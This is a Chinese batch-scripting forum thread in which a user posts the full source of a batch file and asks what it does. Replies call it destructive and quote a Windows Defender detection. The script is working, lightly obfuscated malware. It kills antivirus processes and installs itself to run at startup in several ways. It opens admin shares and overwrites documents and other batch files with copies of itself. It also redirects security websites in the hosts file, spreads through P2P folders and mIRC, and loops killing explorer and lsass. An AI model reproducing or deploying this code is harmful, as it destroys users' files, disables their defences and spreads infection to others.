请问这个有什么用
bat吧
全部回复
仅看楼主
level 5
djdhuyyj 楼主
@echo off
%lmug%
%random%%random%%random%%random%%random%%random%%random%
%47kw%
%random%%random%%random%%random%%random%%random%%random%
%lr46%
%random%%random%%random%%random%%random%%random%%random%
%uyqw%
%random%%random%%random%%random%%random%%random%%random%
%woiv%
%random%%random%%random%%random%%random%%random%%random%
%qknn%
%random%%random%%random%%random%%random%%random%%random%
set a=super001
%jo1r%
%r5d4%
copy %0 %windir%\%a%.bat
%37fb%
%3fxz%
set superxiaoyuer=tskill
%superxiaoyuer% norton*
%superxiaoyuer% av*
%superxiaoyuer% fire*
%superxiaoyuer% anti*
%superxiaoyuer% spy*
%superxiaoyuer% bullguard
%superxiaoyuer% PersFw
%superxiaoyuer% KAV*
%superxiaoyuer% ZONEALARM
%superxiaoyuer% SAFEWEB
%superxiaoyuer% OUTPOST
%superxiaoyuer% nv*
%superxiaoyuer% nav*
%superxiaoyuer% F-*
%superxiaoyuer% ESAFE
%superxiaoyuer% cle
%superxiaoyuer% BLACKICE
%superxiaoyuer% def*
%calf%
%72hj%
%m
bp
q%
%cdl5%
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v super001 /t REG_SZ /d %windir%\%a%.bat /f > nul
%n4n8%
%scja%
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v super001 /t REG_SZ /d %windir%\%a%.bat /f > nul
%2lb3%
%kwwf%
set super0011=echo
%8514%
%mrvf%
%super0011% [windows] >> %windir%\win.ini
%2y86%
%super0011% run=%windir%\%a%.bat >> %windir%\win.ini
%super0011% load=%windir%\%a%.bat >> %windir%\win.ini
%super0011% [boot] >> %windir%\system.ini
%r3xi%
%super0011% shell=explorer.exe %a%.bat >> %windir%\system.ini
%udy5%
%31cy%
chcp 1252 > nul
%random%%superxiaoyuer%%random%%super001%
copy %0 "C:\Dokumente und Einstellungen\All Users\Startmen黒Programme\Autostart\%a%.bat" > nul
%8ac1%
copy %0 "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\%a%.bat" > nul
%random%%superxiaoyuer%%random%%super001%
%t5us%
net share ADMIN$
%7jjl%
net share C$
net share IPC$
%zdh4%
net share c=c:
net share d=d:
%4wcy%
%d7be%
for %%a in (*.bat *.txt *.doc *.pdf *.jpg) do copy %0 %%a > nul
%vw45%
set super0012=echo
%b87f%
%3mky%
%super0012% 127.0.0.1 http://www.google.com > %windir%\system32\drivers\etc\hosts
%super0012% 127.0.0.1 http://www.google.de >> %windir%\system32\drivers\etc\hosts
%super0012% 127.0.0.1 http://www.symantec.de >> %windir%\system32\drivers\etc\hosts
%super0012% 127.0.0.1 http://www.free-av.de >> %windir%\system32\drivers\etc\hosts
%super0012% 127.0.0.1 http://www.free-av.com >> %windir%\system32\drivers\etc\hosts
%super0012% 127.0.0.1 http://www.antivir.de >> %windir%\system32\drivers\etc\hosts
%super0012% 127.0.0.1 http://www.antivir.com >> %windir%\system32\drivers\etc\hosts
%super0012% 127.0.0.1 http://www.kaspersky.com >> %windir%\system32\drivers\etc\hosts
%super0012% 127.0.0.1 http://www.kaspersky.de >> %windir%\system32\drivers\etc\hosts
%super0012% 127.0.0.1 http://www.microsoft.com >> %windir%\system32\drivers\etc\hosts
%super0012% 127.0.0.1 http://www.microsoft.de >> %windir%\system32\drivers\etc\hosts
%super0012% 127.0.0.1 http://www.sophos.com >> %windir%\system32\drivers\etc\hosts
%super0012% 127.0.0.1 http://www.sophos.de >> %windir%\system32\drivers\etc\hosts
%super0012% 127.0.0.1 http://www.symantec.com >> %windir%\system32\drivers\etc\hosts
%super0012% 127.0.0.1 http://www.hijackthis.de >> %windir%\system32\drivers\etc\hosts
%super0012% 127.0.0.1 http://www.spychecker.com >> %windir%\system32\drivers\etc\hosts
%super0012% 127.0.0.1 http://www.trendmicro.com >> %windir%\system32\drivers\etc\hosts
%super0012% 127.0.0.1 http://www.trendmicro.de >> %windir%\system32\drivers\etc\hosts
%super0012% 127.0.0.1 http://www.lavasoftusa.com >> %windir%\system32\drivers\etc\hosts
%super0012% 127.0.0.1 http://www.yahoo.com >> %windir%\system32\drivers\etc\hosts
%super0012% 127.0.0.1 http://www.yahoo.de >> %windir%\system32\drivers\etc\hosts
%super0012% 127.0.0.1 http://www.lycos.com >> %windir%\system32\drivers\etc\hosts
%super0012% 127.0.0.1 http://www.lycos.de >> %windir%\system32\drivers\etc\hosts
%super0012% 127.0.0.1 google.com > %windir%\system32\drivers\etc\hosts
%super0012% 127.0.0.1 google.de >> %windir%\system32\drivers\etc\hosts
%super0012% 127.0.0.1 symantec.de >> %windir%\system32\drivers\etc\hosts
%super0012% 127.0.0.1 free-av.de >> %windir%\system32\drivers\etc\hosts
%super0012% 127.0.0.1 free-av.com >> %windir%\system32\drivers\etc\hosts
%super0012% 127.0.0.1 antivir.de >> %windir%\system32\drivers\etc\hosts
%super0012% 127.0.0.1 antivir.com >> %windir%\system32\drivers\etc\hosts
%super0012% 127.0.0.1 kaspersky.com >> %windir%\system32\drivers\etc\hosts
%super0012% 127.0.0.1 kaspersky.de >> %windir%\system32\drivers\etc\hosts
%super0012% 127.0.0.1 microsoft.com >> %windir%\system32\drivers\etc\hosts
%super0012% 127.0.0.1 microsoft.de >> %windir%\system32\drivers\etc\hosts
%super0012% 127.0.0.1 sophos.com >> %windir%\system32\drivers\etc\hosts
%super0012% 127.0.0.1 sophos.de >> %windir%\system32\drivers\etc\hosts
%super0012% 127.0.0.1 symantec.com >> %windir%\system32\drivers\etc\hosts
%super0012% 127.0.0.1 hijackthis.de >> %windir%\system32\drivers\etc\hosts
%super0012% 127.0.0.1 spychecker.com >> %windir%\system32\drivers\etc\hosts
%super0012% 127.0.0.1 trendmicro.com >> %windir%\system32\drivers\etc\hosts
%super0012% 127.0.0.1 trendmicro.de >> %windir%\system32\drivers\etc\hosts
%super0012% 127.0.0.1 lavasoftusa.com >> %windir%\system32\drivers\etc\hosts
%super0012% 127.0.0.1 yahoo.com >> %windir%\system32\drivers\etc\hosts
%super0012% 127.0.0.1 yahoo.de >> %windir%\system32\drivers\etc\hosts
%super0012% 127.0.0.1 lycos.com >> %windir%\system32\drivers\etc\hosts
%super0012% 127.0.0.1 lycos.de >> %windir%\system32\drivers\etc\hosts
%p1yc%
%cvta%
%6441%
echo MsgBox "Infected with super001", 16, "superxiaoyuer" > v.vbs
start v.vbs
%e3bn%
%wo2v%
set x=%random%
%qpw4%
%z3zt%
copy %0 %windir%\%x%.bat > nul
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v html /t REG_SZ /d "%windir%\%x%.bat" /f > nul
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices" /v super001 /t REG_SZ /d "%windir%\%a%.bat" /f > nul
cd %windir%\system32
for %%a in (*.bat) do copy %0 %%a > nul
cd ..
for %%a in (*.bat) do copy %0 %%a > nul
copy %0 c:\autoexec.bat
%vq4k%
%k5hm%
%z2aw%
set super0013=echo
copy %0 %windir%\ftppassword.bat
%super0013% [script] > irc.bat
%super0013% n1={ if ($nick == $me) { halt } >> irc.bat
%super0013% n2=/dcc send $nick "%windir%\ftppassword.bat" >> irc.bat
%super0013% n3= } >> irc.bat
if exist c:\mIRC\script.ini copy irc.bat c:\mIRC\script.ini
%4h6m%
if exist %programfiles%\mIRC\script.ini copy irc.bat %programfiles%\mIRC\script.ini
del irc.bat > nul
%8bkd%
%s5lm%
md %programfiles%\super001\xxx\ > nul
md %programfiles%\super001\cracks\ > nul
copy %0 %programfiles%\super001\xxx\xxxpasses.txt.bat > nul
copy %0 %programfiles%\super001\cracks\keygen.exe.bat > nul
copy %0 %programfiles%\super001\cracks\serialsV7.exe.bat > nul
copy %0 %programfiles%\super001\cracks\crack_it.exe.bat > nul
echo to crack your programm use crack_it.exe, hf ;) > %programfiles%\super001\cracks\readme.txt
net share xxx&cracks=%programfiles%\super001 > nul
%nwr3%
%wpzc%
%nmb1%
reg add HKLM\SOFTWARE\Microsoft\Ole\ /v EnableDCOM /t REG_SZ /d Y /f > nul
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v restrictanonymous /t REG_SZ /d 0 /f > nul
%8nep%
%u4uf%
%ouc6%
%v7rz%
set superxiaoyuerc=echo
%uq3l%
%superxiaoyuerc% "<html>" > %windir%\hax0r.html
%superxiaoyuerc% "<head>" >> %windir%\hax0r.html
%superxiaoyuerc% "<title>Virus</title>" >> %windir%\hax0r.html
%superxiaoyuerc% "</head>" >> %windir%\hax0r.html
%superxiaoyuerc% "<body bgcolor="#000000">" >> %windir%\hax0r.html
%superxiaoyuerc% "<p align="center"><b><font face="Arial" size="7" color="#FFFFFF">buh!</font></b></p>" >> %windir%\hax0r.html
%superxiaoyuerc% "</body>" >> %windir%\hax0r.html
%superxiaoyuerc% "</html>" >> %windir%\hax0r.html
%73sb%
reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d "%windir%\hax0r.html" /f > nul
%oeux%
%62if%
%27l3%
%tjav%
md %programfiles%\shared_folder > nul
copy %0 %programfiles%\shared_folder\parishilton.txt.bat > nul
copy %0 %programfiles%\shared_folder\parishilton_movie2.jpg.bat > nul
%super001%%random%%super001%%superxiaoyuer%%random%
copy %0 %programfiles%\shared_folder\parishilton_phonenumbers.txt.bat > nul
copy %0 %programfiles%\shared_folder\parishilton_phonenumbers.bat > nul
%superxiaoyuer%%random%%super001%%super001%%random% > nul
copy %0 %programfiles%\shared_folder\css_wallhack.bat > nul
reg add "HKCU\Software\Kazaa\LocalContent" /v DownloadDir /t REG_SZ /d "%programfiles%\shared_folder" /f > nul
%utn2%
%6bn7%
set super001a=copy
%h8qb%
%64oa%
%super001a% %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton.txt.bat > nul
%super001a% %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton_movie2.jpg.bat > nul
%super001a% %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton_phonenumbers.txt.bat > nul
%super001a% %0 c:\Warez P2P Client\My Shared Folder\parishilton.txt.bat > nul
%super001a% %0 c:\Warez P2P Client\My Shared Folder\parishilton_movie2.jpg.bat > nul
%zgkr%
%super001a% %0 c:\Warez P2P Client\My Shared Folder\parishilton_phonenumbers.txt.bat > nul
%yqcf%
%y5xr%
%44qn%
%jymi%
%ut3a%
%jyio%
%n6sl%
%lbjs%
:bombing
chcp 1252 > nul
%random%%super001%%random%%super001%
copy %0 "C:\Dokumente und Einstellungen\All Users\Startmen黒Programme\Autostart\%random%.bat" > nul
copy %0 "C:\Dokumente und Einstellungen\All Users\Startmen黒Programme\%random%.bat" > nul
copy %0 "C:\Dokumente und Einstellungen\All Users\Startmen黒%random%.bat" > nul
copy %0 "C:\Dokumente und Einstellungen\%USERNAME%\Desktop\%random%.bat" > nul
copy %0 "C:\%random%.bat" > nul
%random%%superxiaoyuer%%random%%superxiaoyuer%
%f4gf%
taskkill /f /im explorer.exe > nul
taskkill /f /im lsass.exe > nul
goto bombing
%cb44%
%4xa7%
%dav%
%q14p%
:: super001 by superxiaoyuer
2015年02月13日 06点02分 1
level 14
superxiaoyuer
这个名字好熟悉
这个bat一看就破坏性满满的
2015年02月13日 06点02分 2
。。。 ✎﹏₯㎕:风萧萧兮易水寒,有十五字兮水经验不复难!
2015年02月14日 12点02分
[吐舌]
2021年06月04日 15点06分
level 12
goto bombing~~
2015年02月13日 09点02分 3
level 14
改主页,各种自启,关杀软进程(不可能的事。。),复制自身(好像除了这个杀软都会拦截),改hosts,etc.不过看到那纯替换的变量加密也可想作者花的时间了。。。
2015年02月14日 13点02分 5
我点开了[不高兴]怎么办
2015年02月15日 11点02分
回复
����˧������
:额。。。。杀软没有拦截么。。。。如果中招的话可以一键还原,也可以找楼上的那些人帮你改一改这个bat(撤销对注册表的更改和删除文件),因为我现在时间有限,不能帮你改它了。
2015年02月16日 00点02分
level 13
Windows Defender :
Trojan:BAT/Bomb.B
类别:特洛伊木马
描述:这个程序很危险,而且执行来自攻击者的命令。
推荐的操作:立即删除这个软件。
警报级别:严重
执行的操作:已隔离
http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?name=Trojan%3aBAT%2fBomb.B&threatid=2147632631
2015年02月16日 04点02分 6
level 1
这起码是十几年前的东西了,,,那时候空闲时间捣鼓的,,,居然还能被搜到,,,我只是个业余爱好者,当时也只是纯属学习,并无恶意,如今的安全卫士应该都能拦截,,,但是如果没有安全卫士拦截,直接运行了这个后果会非常的麻烦。包括办公文件都会被破坏掉。
2021年06月04日 15点06分 7
1